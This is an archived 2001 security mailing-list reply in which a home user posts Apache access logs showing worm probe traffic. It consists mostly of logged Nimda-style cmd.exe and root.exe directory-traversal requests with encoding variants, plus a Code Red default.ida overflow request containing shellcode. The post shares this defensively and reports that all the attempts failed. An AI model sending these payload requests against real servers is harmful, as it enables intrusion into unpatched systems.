RE: Newest Nimda variant? Scanning ftp,telnet,smtp,snmp?

From: Bill Walls (stauph@hotmail.com)
Date: 12/22/01 

From: "Bill Walls" <stauph@hotmail.com>
To: tlangdon@atctraining.com.au, security-basics@securityfocus.com
Date: Fri, 21 Dec 2001 15:15:00 -0900

My web loges show a similar increase.
63.149.122.72 - - [20/Dec/2001:01:25:30 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:01:25:30 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:35 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:35 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:35 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:35 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:01:25:36 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:01:25:36 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:36 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:05:59:04 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.90 - - [20/Dec/2001:05:59:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.90 - - [20/Dec/2001:05:59:05 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:05:59:05 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:05:59:06 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:05:59:06 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:05:59:06 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:05:59:07 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.90 - - [20/Dec/2001:05:59:07 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:05:59:07 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:05:59:08 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:05:59:08 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:05:59:08 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:05:59:09 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:05:59:09 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:05:59:09 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:07:57:29 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.90 - - [20/Dec/2001:07:57:29 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.90 - - [20/Dec/2001:07:57:29 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:07:57:30 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:07:57:30 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:07:57:30 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:07:57:30 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:07:57:31 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.90 - - [20/Dec/2001:07:57:31 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:07:57:31 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:07:57:32 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:07:57:32 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:07:57:32 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:07:57:33 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:07:57:33 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:07:57:33 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:08:42:56 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.90 - - [20/Dec/2001:08:42:56 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.90 - - [20/Dec/2001:08:42:56 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:08:42:57 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:08:42:57 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:08:42:57 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:08:42:58 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:08:42:58 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.90 - - [20/Dec/2001:08:42:58 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:08:42:59 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:08:42:59 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:08:42:59 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:08:43:00 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:08:43:00 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:08:43:00 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:08:43:01 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:09:59:38 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:09:59:38 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:09:59:38 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:09:59:39 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:09:59:39 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:09:59:39 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:09:59:40 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:09:59:40 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:09:59:40 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:09:59:41 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:09:59:41 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:09:59:41 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:09:59:42 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:09:59:42 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:09:59:42 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:09:59:43 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:10:48:05 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:10:48:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:10:48:06 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:10:48:06 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:10:48:06 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:10:48:07 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:10:48:07 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:10:48:07 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:10:48:08 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:10:48:08 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:10:48:08 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:10:48:08 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:10:48:09 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:10:48:09 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:10:48:09 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:10:48:10 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:11:24:04 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:11:24:04 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:11:24:05 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:11:24:05 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:11:24:05 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:11:24:06 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:11:24:06 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:11:24:06 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:11:24:07 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:11:24:07 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:11:24:07 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:11:24:08 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:11:24:08 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:11:24:08 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:11:24:08 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:11:24:09 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

...etc etc..
Although this is not the magnitude you qoute, as a home user on the
particular IP block that I am on...I haven't seen my port 80 hit this hard
in awhile. As far as my other services go...I'm not seeing anything out of
the usual...but again on port 80...I see alot of these..
211.196.198.70 - - [19/Dec/2001:07:51:37 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
  HTTP/1.0" 400 325
That happens about 6 times a day. Mostly Class A addresses though.
I recognize this as an overflow technique coupled with some unicode
sequences...I really don't KNOW what it's trying to do...but since I run
apache and not IIS I'm rather annoyed then afraid.

"Buffer Overflow in /dev/stomach due to vodka.o!"

_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com